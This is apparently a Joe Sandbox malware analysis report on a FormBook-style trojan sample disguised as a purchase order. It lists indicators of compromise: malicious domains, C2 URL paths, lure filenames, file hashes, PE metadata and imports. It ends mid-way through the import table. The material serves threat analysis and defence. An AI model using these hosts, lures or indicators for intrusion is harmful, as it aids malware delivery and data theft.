47.254.140.255 | www.yvcp3.info | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
104.21.57.248 | www.rgenerousrs.store | United States | 13335 | CLOUDFLARENETUS | false
149.88.81.190 | www.xcvbj.asia | United States | 188 | SAIC-ASUS | false
156.251.17.224 | www.duwixushx.xyz | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
154.88.22.101 | www.t91rl7.pro | Seychelles | 40065 | CNSERVERSUS | false
161.97.168.245 | www.nb-shenshi.buzz | United States | 51167 | CONTABODE | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1568199
Start date and time: 2024-12-04 12:48:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO 4110007694.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@22/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 47
• Number of non-executed functions: 280
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: PO 4110007694.exe
                                                                  TimeTypeDescription
                                                                  06:49:55API Interceptor9744156x Sleep call for process: bitsadmin.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
209.74.77.107 | Latest advice payment.exe | Get hash | malicious | FormBook | Browse | www.learnwithus.site/alu5/
209.74.77.107 | SW_5724.exe | Get hash | malicious | FormBook | Browse | www.happyjam.life/4ii9/
209.74.77.107 | quotation.exe | Get hash | malicious | FormBook | Browse | www.gadgetre.info/8q8w/
209.74.77.107 | Quotation Validity.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.beyondfitness.live/fbpt/
209.74.77.107 | specifications.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.gadgetre.info/8q8w/
209.74.77.107 | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | www.learnwithus.site/alu5/
209.74.77.107 | ARRIVAL NOTICE.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.gadgetre.info/8q8w/
209.74.77.107 | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | www.learnwithus.site/alu5/
209.74.77.107 | Purchase Order PO.exe | Get hash | malicious | FormBook | Browse | www.beyondfitness.live/fbpt/
209.74.77.107 | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse | www.learnwithus.site/alu5/
104.21.34.103 | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | www.rafconstrutora.online/1jao/
185.27.134.144 | Latest advice payment.exe | Get hash | malicious | FormBook | Browse | www.amayavp.xyz/d9ku/
185.27.134.144 | Order MEI PO IM202411484.exe | Get hash | malicious | FormBook | Browse | www.amayavp.xyz/572a/
185.27.134.144 | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | www.amayavp.xyz/d9ku/
185.27.134.144 | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | www.amayavp.xyz/d9ku/
185.27.134.144 | IETC-24017.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.amayavp.xyz/572a/
185.27.134.144 | purchase Order.exe | Get hash | malicious | FormBook | Browse | www.amayavp.xyz/d9ku/
185.27.134.144 | DOC_114542366.vbe | Get hash | malicious | FormBook | Browse | www.amayavp.xyz/dcdf/
185.27.134.144 | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse | www.amayavp.xyz/d9ku/
185.27.134.144 | shipping doc_20241111.exe | Get hash | malicious | FormBook | Browse | www.hasthosting.xyz/04fb/
185.27.134.144 | SHIPPING DOC_20241107.exe | Get hash | malicious | FormBook | Browse | www.hasthosting.xyz/04fb/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
r0lqcud7.nbnnn.xyz | Latest advice payment.exe | Get hash | malicious | FormBook | Browse | 27.124.4.246
r0lqcud7.nbnnn.xyz | Document_084462.scr.exe | Get hash | malicious | FormBook, GuLoader | Browse | 23.225.159.42
r0lqcud7.nbnnn.xyz | quotation.exe | Get hash | malicious | FormBook | Browse | 27.124.4.246
r0lqcud7.nbnnn.xyz | YH-3-12-2024-GDL Units - Projects.exe | Get hash | malicious | FormBook | Browse | 23.225.159.42
r0lqcud7.nbnnn.xyz | Proforma invoice - Arancia NZ.exe | Get hash | malicious | FormBook | Browse | 202.79.161.151
r0lqcud7.nbnnn.xyz | lKvXJ7VVCK.exe | Get hash | malicious | FormBook | Browse | 23.225.159.42
r0lqcud7.nbnnn.xyz | BASF Hungária Kft.exe | Get hash | malicious | FormBook | Browse | 27.124.4.246
r0lqcud7.nbnnn.xyz | specifications.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 23.225.159.42
r0lqcud7.nbnnn.xyz | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | 202.79.161.151
r0lqcud7.nbnnn.xyz | ARRIVAL NOTICE.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 202.79.161.151
www.amayavp.xyz | Latest advice payment.exe | Get hash | malicious | FormBook | Browse | 185.27.134.144
www.amayavp.xyz | Order MEI PO IM202411484.exe | Get hash | malicious | FormBook | Browse | 185.27.134.144
www.amayavp.xyz | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | 185.27.134.144
www.amayavp.xyz | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | 185.27.134.144
www.amayavp.xyz | IETC-24017.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 185.27.134.144
www.amayavp.xyz | purchase Order.exe | Get hash | malicious | FormBook | Browse | 185.27.134.144
www.amayavp.xyz | DOC_114542366.vbe | Get hash | malicious | FormBook | Browse | 185.27.134.144
www.amayavp.xyz | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse | 185.27.134.144
www.vayui.top | Latest advice payment.exe | Get hash | malicious | FormBook | Browse | 172.67.145.234
www.vayui.top | ZAMOWIEN.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse | 172.67.145.234
www.vayui.top | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | 104.21.95.160
www.vayui.top | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | 172.67.145.234
www.vayui.top | ZAMOWIEN.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse | 172.67.145.234
www.vayui.top | SİPARİŞ No.112024-pdf.bat.exe | Get hash | malicious | FormBook, GuLoader | Browse | 104.21.95.160
www.vayui.top | purchase Order.exe | Get hash | malicious | FormBook | Browse | 172.67.145.234
www.vayui.top | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse | 172.67.145.234
www.7vh2wy.top | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | 20.2.249.7
www.7vh2wy.top | Item-RQF-9456786.exe | Get hash | malicious | Unknown | Browse | 20.2.249.7
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
MULTIBAND-NEWHOPEUS | Latest advice payment.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107
MULTIBAND-NEWHOPEUS | Document_084462.scr.exe | Get hash | malicious | FormBook, GuLoader | Browse | 209.74.77.109
MULTIBAND-NEWHOPEUS | Pp7OXMFwqhXKx5Y.exe | Get hash | malicious | FormBook | Browse | 209.74.79.42
MULTIBAND-NEWHOPEUS | SW_5724.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107
MULTIBAND-NEWHOPEUS | 72STaC6BmljfbIQ.exe | Get hash | malicious | FormBook | Browse | 209.74.79.42
MULTIBAND-NEWHOPEUS | quotation.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107
MULTIBAND-NEWHOPEUS | Proforma invoice - Arancia NZ.exe | Get hash | malicious | FormBook | Browse | 209.74.77.109
MULTIBAND-NEWHOPEUS | Quotation Validity.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 209.74.77.107
MULTIBAND-NEWHOPEUS | specification and drawing.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 209.74.64.187
MULTIBAND-NEWHOPEUS | Order MEI PO IM202411484.exe | Get hash | malicious | FormBook | Browse | 209.74.77.108
CLOUDFLARENETUS | fiyati_teklif 65W20_ Büyük mokapto Siparişi jpeg docx _ .exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.67.152
CLOUDFLARENETUS | https://ammyy.com/en/downloads.html | Get hash | malicious | Flawedammyy | Browse | 162.159.61.3
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.16.9
CLOUDFLARENETUS | Advertising Agreement for Youtube Cooperation.scr | Get hash | malicious | LummaC Stealer | Browse | 104.21.33.143
CLOUDFLARENETUS | Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat | Get hash | malicious | Unknown | Browse | 104.21.36.187
CLOUDFLARENETUS | fUHl7rElXU.xlsx | Get hash | malicious | Unknown | Browse | 188.114.97.6
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.16.9
CLOUDFLARENETUS | letter_olivia.law_mercerhole.co.uk.pdf | Get hash | malicious | HTMLPhisher | Browse | 172.67.149.151
CLOUDFLARENETUS | Order_DEC2024.wsf | Get hash | malicious | Remcos | Browse | 104.21.84.67
CLOUDFLARENETUS | Bank Swift and SOA PRN0072003410853_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 104.21.67.152
WILDCARD-ASWildcardUKLimitedGB | Latest advice payment.exe | Get hash | malicious | FormBook | Browse | 185.27.134.144
WILDCARD-ASWildcardUKLimitedGB | quotation.exe | Get hash | malicious | FormBook | Browse | 185.27.134.206
WILDCARD-ASWildcardUKLimitedGB | YH-3-12-2024-GDL Units - Projects.exe | Get hash | malicious | FormBook | Browse | 185.27.134.206
WILDCARD-ASWildcardUKLimitedGB | Order MEI PO IM202411484.exe | Get hash | malicious | FormBook | Browse | 185.27.134.206
WILDCARD-ASWildcardUKLimitedGB | mips.elf | Get hash | malicious | Mirai | Browse | 82.163.179.123
WILDCARD-ASWildcardUKLimitedGB | BASF Hungária Kft.exe | Get hash | malicious | FormBook | Browse | 185.27.134.206
WILDCARD-ASWildcardUKLimitedGB | specifications.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 185.27.134.206
WILDCARD-ASWildcardUKLimitedGB | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | 185.27.134.144
WILDCARD-ASWildcardUKLimitedGB | ARRIVAL NOTICE.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 185.27.134.206
WILDCARD-ASWildcardUKLimitedGB | OUTSTANDING BALANCE PAYMENT.exe | Get hash | malicious | FormBook | Browse | 185.27.134.144
No context
No context
Process:C:\Users\user\Desktop\PO 4110007694.exe
File Type:data
Category:dropped
Size (bytes):289280
Entropy (8bit):7.994152633828472
Encrypted:true
SSDEEP:6144:xNTeMLeSp9Pqvj4C7FqfViOsLEX5f2w17zOLSkvhlvmKM:TTeKlrqrBqfVilXwNyLS8/M
MD5:471D7479310FB537403E3A817CA7376A
SHA1:386E5D50A7C07661B59EFD298318E679FB0FF247
SHA-256:ECD1683415CACE86FC926869B021A862A2B4DD246EF7C17FF0C7A1EC9669B757
SHA-512:9B198B6BA9BCC9DD240D6698BE390B363560C0ADDBF97FA2215B630039802BD2250C1184D6B8684A18D843D45BB13F1D7251BF34ADF2602F9A892C1708103039
Malicious:false
Reputation:low
                                                                  Preview:~l.TTDO5GADA..V2.360TWDOuCADAKKV2H360TWDO5CADAKKV2H360TWDO5C.DAKEI.F3.9.v.Ny.`.)"8vB:\QB5:d,T-/+5k)3.:FX.=9d.z.a)./.x?E9.0TWDO5C8EH.v6U..VW.j$(.Y..q+1.R...h7#./..}+,.`!P^.40.O5CADAKK.wH3z1UW.9..ADAKKV2H.62U\ED5C.@AKKV2H360.CDO5SADA;OV2Hs60DWDO7CABAKKV2H300TWDO5CA4EKKT2H360TUD..CATAK[V2H3&0TGDO5CADQKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO.7$<5KKVF.760DWDOmGADQKKV2H360TWDO5CaDA+KV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKK
Process:C:\Users\user\Desktop\PO 4110007694.exe
File Type:data
Category:dropped
Size (bytes):289280
Entropy (8bit):7.994152633828472
Encrypted:true
SSDEEP:6144:xNTeMLeSp9Pqvj4C7FqfViOsLEX5f2w17zOLSkvhlvmKM:TTeKlrqrBqfVilXwNyLS8/M
MD5:471D7479310FB537403E3A817CA7376A
SHA1:386E5D50A7C07661B59EFD298318E679FB0FF247
SHA-256:ECD1683415CACE86FC926869B021A862A2B4DD246EF7C17FF0C7A1EC9669B757
SHA-512:9B198B6BA9BCC9DD240D6698BE390B363560C0ADDBF97FA2215B630039802BD2250C1184D6B8684A18D843D45BB13F1D7251BF34ADF2602F9A892C1708103039
Malicious:false
Reputation:low
                                                                  Preview:~l.TTDO5GADA..V2.360TWDOuCADAKKV2H360TWDO5CADAKKV2H360TWDO5C.DAKEI.F3.9.v.Ny.`.)"8vB:\QB5:d,T-/+5k)3.:FX.=9d.z.a)./.x?E9.0TWDO5C8EH.v6U..VW.j$(.Y..q+1.R...h7#./..}+,.`!P^.40.O5CADAKK.wH3z1UW.9..ADAKKV2H.62U\ED5C.@AKKV2H360.CDO5SADA;OV2Hs60DWDO7CABAKKV2H300TWDO5CA4EKKT2H360TUD..CATAK[V2H3&0TGDO5CADQKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO.7$<5KKVF.760DWDOmGADQKKV2H360TWDO5CaDA+KV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKKV2H360TWDO5CADAKK
Process:C:\Windows\SysWOW64\bitsadmin.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Reputation:high, very likely benign file
                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.194968253613514
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:PO 4110007694.exe
File size:1'212'928 bytes
MD5:125b9b9f3011e06fcb331140ce8bf01f
SHA1:39268897cfc54a3bcb8e94319708f1666297f862
SHA256:ad7f45c75e8fa4024a61f3ec31ae47385ebca8092a915d5c3c4e4fcc8f117a49
SHA512:4c1b53ac8a1d768eab3148780cbef5228f7124a725f02adcee713b90777cfd02548cebfd321ce8de855ef4eee51484447a8985af7642333afa51f1d0903a30fc
SSDEEP:24576:ru6J33O0c+JY5UZ+XC0kGso6FaNiXPz3anIkBJq/HWY:Fu0c++OCvkGs9FaNi7aI+QOY
TLSH:C045CF22B3DDC361CB669173BF29B7016EBF7C614630B85B2F880D7DA950162162DB63
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash:aaf3e3e3938382a0
Entrypoint:0x427dcd
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:0x674FA339 [Wed Dec 4 00:32:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007F2050F0DCEAh
jmp 00007F2050F00AB4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F2050F00C3Ah
cmp edi, eax
jc 00007F2050F00F9Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F2050F00C39h
rep movsb
jmp 00007F2050F00F4Ch
cmp ecx, 00000080h
jc 00007F2050F00E04h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F2050F00C40h
bt dword ptr [004BE324h], 01h
jc 00007F2050F01110h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F2050F00DDDh
test edi, 00000003h
jne 00007F2050F00DEEh
test esi, 00000003h
jne 00007F2050F00DCDh
bt edi, 02h
jnc 00007F2050F00C3Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F2050F00C43h
movq xmm1, qword ptr [esi]
sub ecx, 08h
                                                                  lea esi, dword ptr [esi+08h]
                                                                  movq qword ptr [edi], xmm1
                                                                  lea edi, dword ptr [edi+08h]
                                                                  test esi, 00000007h
                                                                  je 00007F2050F00C95h
                                                                  bt esi, 03h
                                                                  jnc 00007F2050F00CE8h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5f9b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x127000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5f9b0 | 0x5fa00 | 082f47433536359b9185e7907e9eba22 | False | 0.9314185049019608 | data | 7.901867117227564 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x127000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x56c77 | data | | | 1.000326349638624
RT_GROUP_ICON | 0x126430 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1264a8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1264bc | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1264d0 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1264e4 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1265c0 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, 